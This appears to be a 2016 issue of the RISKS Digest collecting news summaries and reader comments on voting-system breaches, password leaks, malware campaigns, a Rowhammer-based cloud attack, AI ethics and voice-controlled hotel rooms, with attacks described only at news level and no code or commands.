Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
Casey A. Klofstad, Stephen Nowicki and Rindy C, Anderson How Voice Pitch Influences Our Choice of Leaders *American Scientist*, September-October 2016, pages 282--287 When candidates speak, their vocal characteristics—as well as their words—influence voters' attitudes toward them Boxed summaries: * Research subjects, both male and female, preferred a lower-pitched voice, whether the candidate was female or male. * Does the language-processing circuitry of the human brain deal with meaning apart from intonation? Fascinating article. PGN
Michael Kan, Computerworld, 30 Aug 2016 In June, attackers managed to steal administrative login credentials from a county official in the U.S. http://www.computerworld.com/article/3113707/security/hackers-had-a-chance-to-hamper-voting-by-deleting-records.html opening text: A U.S. cybersecurity monitor on Monday described another breach of a voter election system just after a leaked FBI report revealed two similar attacks. In June, anonymous hackers stole administrative login credentials in an unnamed county that would have let them delete voter registration records and prevent citizens from casting ballots. http://www.cso.com.au/article/605914/hackers-had-chance-hamper-voting-by-deleting-records/
Dan Lieberman and Russ Finkelstein, Fusion.net, 31 Aug 2016 This item from Fusion TV (with a short news clip) on hackable touchscreen voting machines reminds us why optical-scan paper ballots seem much better. It also notes Andrew Appel hacking into a paperless touch-screen voting machine in seven minutes. http://fusion.net/story/342741/hacking-electronic-voting-machines-election-2016/
http://cyberattacksquad.com/icit-analysis-hacking-elections-is-easy-part-one-tactics-techniques-and-procedures/
Did you know that * Only 1 out of the top 20 U.S. banks has an 'A' grade in cybersecurity? * 75%, of the top 20 US commercial banks, are afflicted with malware? http://info.securityscorecard.com/2016-financial-cybersecurity-report (Registration required) Security Scorecard analyzed 7,111 US financial institutions to find the most critical vulnerabilities and security weaknesses within investment banks, asset management firms, and major commercial banks in the United States.
[Note: This item comes from friend Gary Rimar. DLH] <via Geoff Goodfellow as well. PGN> New hacking technique stealthily changes memory of virtual servers, 12 Aug 2016 <http://www.homelandsecuritynewswire.com/dr20160812-new-hacking-technique-stealthily-changes-memory-of-virtual-servers> For the first time ever a team of Dutch hacking experts managed to alter the memory of virtual machines in the cloud without a software bug, using a new attack technique. With this technique an attacker can crack the keys of secured virtual machines or install malware without it being noticed. It is a new de-duplication-based attack in which data can not only be viewed and leaked, but also modified using a hardware glitch. By doing so the attacker can order the server to install malicious and unwanted software or allow logins by unauthorized persons. De-duplication and Rowhammer bug VUA notes that with the new attack technique Flip Feng Shui (FSS), an attacker rents a virtual machine on the same host as the victim. This can be done by renting many virtual machines until one of them lands next to the victim. A virtual machine in the cloud is often used to run applications, test new software, or run a Web site. There are public (for everyone), community (for a select group), and private (for one organization accessible) clouds. The attacker writes a memory page that he knows exists in the victim on the vulnerable memory location and lets it de-duplicate. As a result, the identical pages will be merged into one in order to save space (the information is, after all, the same). That page is stored in the same part of the memory of the physical computer. The attacker can now modify the information in the general memory of the computer. This can be done by triggering a hardware bug dubbed Rowhammer, which causes flip bits from 0 to 1 or vice versa, to seek out the vulnerable memory cells and change them. Cracking OpenSSH The researchers of the Vrije Universiteit Amsterdam, who worked together with a researcher from the Catholic University of Leuven, describe in their research two attacks on the operating systems Debian and Ubuntu. The first FFS attack gained access to the virtual machines through weakening OpenSSH public keys. The attacker did this by changing the victim's public key in one bit. In the second attack, the settings of the software management application apt were adjusted by making minor changes to the URL from where apt downloads software. The server could then install malware that presents itself as a software update. The integrity check could be circumvented by making a small change to the public key that verifies the integrity of the apt-get software packages. [...]
Not quite clear how this happened, but cellphone locations are suspected. http://fusion.net/story/339018/facebook-psychiatrist-privacy-problems/
[via NNSquad] http://www.cso.com.au/article/606069/staff-breach-onelogin-exposes-password-storage-feature/ Several thousand enterprise customers, including high profile tech startups, use OneLogin for single sign-on to access enterprise cloud applications. The company has championed the SAML standard for single sign-on and promises customers an easy way to enable multi-factor authentication from devices to cloud applications. But it appears the company wasn't using multi-factor authentication for its own systems.
http://www.nytimes.com/reuters/2016/08/30/business/30reuters-cyber-heist-swift.html SWIFT disclosed new hacking attacks on its member banks, on the heels of February's high-profile $81 million heist at Bangladesh Bank.
Dropbox hack leads to leaking of 68m user passwords on The Internet Data stolen in 2012 breach, containing encrypted passwords and details of around two-thirds of cloud firm's customers, has been leaked. https://www.theguardian.com/technology/2016/aug/31/dropbox-hack-passwords-68m-data-breach [This is just coming out now? The hack occurred four years ago, in 2012. Their advice: change your password! <So it can be hacked anew -- assuming the vulnerabilities still exist?> PGN]
TechCrunch.com, 1 Sep 2016. This hack occurred in March 2012, according to LeakedSource, "MD5 is seriously out of style. ... Moreover, Last.fm didn't use salt in its hashing process." https://techcrunch.com/2016/09/01/43-million-passwords-hacked-in-last-fm-breach/ "For the second time this week, our advice is that you change your password immediately... The most popular password pulled from the Last.fm database was 123456. Seriously, it's 2016 people—use a platform like LastPast to generate randomized, complex passwords that are unique to every service for which you sign up." [This is just coming out now? The hack occurred four years ago, in 2012. Their advice: change your password! <So it can be hacked anew -- assuming the vulnerabilities still exist?> PGN]
https://haveibeenpwned.com [As I am typing this, their website shows 129 websites and 1,388,845.883 accounts that have been pwned! PGN]
Danny Palmer, ZDnet, 2 Sep 2016 Not content with stealing your bank details, Betabot will also infect your computer with Cerber ransomware too. http://www.zdnet.com/article/this-data-stealing-trojan-malware-is-the-first-to-also-infect-you-with-ransomware/
http://arstechnica.com/security/2016/08/new-attack-steals-private-crypto-keys-by-corrupting-data-in-computer-memory/
Kimpton Hotels & Restaurants Notifies Customers of Payment Card Incident https://www.kimptonhotels.com/promos/payment-card-notification
Lucian Constantin, PC World, 30 Aug 2016 The new attack uses Word documents loaded with malicious code http://www.pcworld.com/article/3114066/security/attackers-deploy-rogue-proxies-on-computers-to-hijack-https-traffic.html opening text: Security researchers have highlighted in recent months how the web proxy configuration in browsers and operating systems can be abused to steal sensitive user data. It seems that attackers are catching on. A new attack spotted and analyzed by malware researchers from Microsoft uses Word documents with malicious code that doesn't install traditional malware, but instead configures browsers to use a web proxy controlled by attackers.
Zack Whittaker for Zero Day, ZDnet, 29 Aug 2016 The denial-of-service flaws could be used to install malware. http://www.zdnet.com/article/kaspersky-fixes-antivirus-crash-bug/
Zack Whittaker for Zero Day, ZDnet, 30 Aug 2016 The company said the possible security issue is limited to Google domains. http://www.zdnet.com/article/google-wont-fix-login-page-flaw-can-lead-to-malware-download/ selected text: Google has said it will not fix a potential security flaw that could trick a user into downloading malware from its login window. But Google said that the redirect page has to fall within "*google.com" domains, limiting its impact. The problem, said Woods, is that malware hosted on "drive.google.com" or "docs.google.com" which fall within the Google subdomain parameters could still be used to serve up malware, and hide it as a genuine Google login page.
So much for counter-phishing training: Half of people click anything sent to them. http://arstechnica.com/security/2016/08/researchers-demonstrate-half-of-people-will-click-on-any-link-theyre-sent/
Aimee Chanthadavong, ZDnet 2 Sep 2016 A 30-year-old Perth constable will remain on duty, despite being charged for allegedly accessing a restricted computer. http://www.zdnet.com/article/perth-cop-accessed-restricted-computer/ [There is more in the article than the title and blurb imply.] Final paragraph: In a recent report by the Queensland CCC [Crime and Corruption Commission], it revealed the Queensland Police made up 67 percent of the around 400 allegations of information misuse in the state during 2014-15.
Peter Sayer, Computerworld, 30 Aug 2016 Apple must repay up to the equivalent of US$14.5 billion in underpaid taxes in Ireland, the European Commission ruled on 30 Aug 2016. Two Irish tax rulings constituted illegal state aid, the European Commission ruled. http://www.computerworld.com/article/3113753/it-industry/apple-must-repay-145-billion-in-underpaid-taxes-in-ireland.html selected text [PGN-ed]: Apple's tax benefits in Ireland are illegal, and the company will have to pay up to the equivalent of roughly US$14.5 billion in back taxes, plus interest. The investigation found that Apple's effective tax rate on profit reported in Ireland was just 1/2000, falling to 1/20000 in 2014. Apple and the Irish tax authority disputed the commission's charges. Vestager said that Irish tax authorities had allowed Apple to split profit from the two companies, which were subject to normal taxes, with "head office" companies that were subject to no taxes, either in Ireland or elsewhere. "Splitting the profits did not have any factual or economic justification. The so-called head office had no employees, no premises, no real activities," she said. Those head-office companies were allocated almost all the profits. This selective tax treatment in Ireland is illegal under European Union state aid rules, she said, and distorts competition.
John Markoff, *The New York Times*, 1 Sep 2016 [in the 2 Sep paper], via ACM TechNews, Friday, September 2, 2016 Researchers from Alphabet, Amazon, Facebook, IBM, and Microsoft are forming an alliance to establish an ethical standard for artificial intelligence (AI) development. Four people involved in the alliance's foundation say the group's intent is to make sure AI research is focused on societal benefits and not harm. One of the group's executives, Microsoft researcher Eric Horvitz, recipient of the 2015 ACM AAAI Allen Newell Award, sponsors a Stanford University group that on Thursday issued a report underscoring the value of the industry effort. The report's authors warn it will be impossible to regulate AI, "since there is no clear definition of AI (it isn't any one thing), and the risks and considerations are very different in different domains." Study co-author and University of Texas at Austin researcher Peter Stone recommends boosting awareness of and expertise about AI at all levels of government. Both the AI industry group and a proposed initiative at the Massachusetts Institute of Technology (MIT) seek to investigate AI's social and economic implications, with the latter discussing the design of new AI and robotic systems with "society in the loop." "What we want to do is support and reinforce the social scientists who are doing research which will play a role in setting policies," says MIT Media Lab director Joichi Ito. http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1104cx2fb31x072199&
Casey Baseel, RocketNews24, 29 Aug 2016 http://en.rocketnews24.com/2016/08/28/kawasaki-developing-ai-motorcycles-that-can-talk-with-learn-from-their-riders/ selected text: Through continued communication, the bike will learn the owner's amount of motorcycle experience, skill level, and individual riding style. But what's likely to have a more direct effect on the riding experience is a planned feature in which after developing a profile of the rider, various vehicle settings will automatically be adjusted accordingly. [While there are advantages, what happens if someone borrows a configured bike?]
Last Wednesday, Starwood's tech-centric hotel brand, Aloft unveiled its top-secret [*] Project Jetson. Now, for the first time, hotel guests can talk to their rooms, thanks to the help of Apple's ubiquitous voice-powered assistant, Siri. http://www.bloomberg.com/Research/stocks/private/snapshot.asp?privcapid=7685157 Siri, raise the temperature to 68 degrees, or, Siri, turn out the bathroom light, a guest might say -— if they were staying at Aloft's Boston Seaport locations, where Project Jetson is currently piloting. or Santa Clara. http://www.starwoodhotels.com/alofthotels/property/overview/index.html?propertyID=4142&language=en_US http://www.aloftsantaclara.com/ Depending on your outlook regarding hospitality, that may seem unnecessary or frivolous—or scarily futuristic. But maybe you've already learned first-hand that when most of these functions are embedded on bedside tablet devices, they quickly get buggy with age. Or maybe you've gotten into a tightly tucked bed after a long day of meetings, only to find that a light is still on and there's no way to turn it off remotely. Then you know that Project Jetson isn't just about technology for technology's sake; it's about making your hotel room more intuitive. I hope it's more deterministic than my car's voice control, only selectively understanding my verbal commands. On a good day I can change radio stations or turn on rear window defroster. On a bad day, anything I haven't requested can happen. I can't wait to experience that suspense and excitement in a voice-controlled self-driving car. Or even hotel room. Plus, of course—the walls will always be listening. I had that experience recently—ending phone call, iPad across room. I said "Thanks for your help" and iPad responded politely with something like "You're welcome". I'm sure Project Jetson will archive/analyze what it hears purely for analysis and improvement and will maintain complete confidentiality. The fact that "privacy" doesn't appear in the article must be just an oversight. Gabriel Goldberg, Computers and Publishing, Inc. gabe@gabegold.com 3401 Silver Maple Place, Falls Church, VA 22042 (703) 204-0433 [* top-secret Project Jetson unveiled? Maybe, certainly not Top Secret, and actually not very secret at all. PGN]
Amy Golod, *U.S. News and World Report*, 31 Aug 2016, via ACM TechNews, Friday, September 2, 2016 The College Board's new advanced placement (AP) Computer Science Principles course will introduce computer science and programming fundamentals to U.S. high school students, with a focus on collaboration and creativity. Unlike the existing AP Computer Science A course, the new course will not require previous knowledge of programming languages and technology, and it is aimed at making computing accessible to underrepresented demographics. Students will be exposed to a variety of applications and programming languages through project-based learning. In addition to algorithms and programming, the course will concentrate on the global effects of computing and the ethical usage of data. "We're focusing not just on the knowledge we want students to have, but the practices and experiences we want them to have before they leave the course," says the College Board's Richard Kick. Now that a three-year pilot program has concluded, Computer Science Principles will launch in the fall and consist of two projects and a final exam. For one project, students will use a digital medium to explain the development of a computer science application; for the second project, students will build an app using a programming language of their choice. The project-based approach is intended to engage classes filled with students who have varying levels of programming experience. http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1104cx2fb36x072199&
If you delete your cookies and Internet history, are you willfully destroying material evidence? * Besty Feist alleges Paxfire intentionally intercepted her communications in violation of the Wiretap Act. * Paxfire claims she cleared her Internet history, which would have allowed them to refute her allegations. * Feist argues that Paxfire does not need her Internet history to defend against the allegations because this action is about Paxfire's policies and practices, not merely specific instances of interception and redirection. Ronald L. Ellis, U.S. Magistrate Judge delivered a somewhat Solomonic mixed ruling, Paxfire's motion is Granted in Part and Denied in Part. Case 1:11-cv-05436-LGS-RLE [Starkly PGN-ed] Thanks to Andrew Grosso for noting this case.
Choice Hotels (www.choicehotels.com) is using some of the more advanced CAPTCHAs - e.g., "which of these pictures has a house number". Today I've run into a new version which has me completely stumped - a large image broken into squares, and the question "which of these blocks has a street sign". The street signs are frequently split across multiple blocks, and they're not necessarily American or international standards (e.g., one had signs in Chinese, but I don't know if those are street signs). So I'm in the position of trying to figure out what an image recognition system thinks is a street sign - e.g., is a small street sign at an oblique angle something it will recognize? What if it's the name of a street where some of the letters are in one block and others in another? How about a vertical sign that spans several blocks, where the bottom part of the sign is just a solid color - does that count? I've encountered all of these and many more edge cases in the past few minutes. After about 10 tries, I have been unsuccessful at getting logged in. I wonder if they track the failure rate? The RISK is that a clever algorithm (in this case image recognition) that a human is presumed to be able to understand (but a computerized system is not) may be too smart for its own good.
On July 29, President Obama signed bill S.764 into law, dealing a major blow to the movement to require GMO labeling. The new law, which food safety groups call the "Deny Americans the Right to Know" (DARK) Act, has at least three key parts that undermine Vermont's popular GMO labeling bill and make it nearly impossible for Americans to know what's in their food. [...] In the early 1990s, a European genetic engineering company was preparing to field test its genetically modified version of /Klebsiella planticola/, which it had tested in the lab and presumed to be safe. But if it weren't for the work of a team of independent scientists led by Elaine Ingham, that company could have literally killed every terrestrial plant on the planet. http://www.alternet.org/food/how-one-gmo-nearly-took-down-planet Extreme? Exaggerated? Valid? Can't tell. But legislating against providing information seems inherently suspicious behavior. Right up there with "Nothing to see here, move along."
Google Maps' de-emphasis of streets is (in my opinion) an improvement for users traveling rural roads, where road condition is crucial. Their previous presentation often showed "roads" which were nothing more than two tire tracks through a grassy field. Even in satellite view, their previous intense white lines often hid the actual condition of the road from view.
Please report problems with the web pages to the maintainer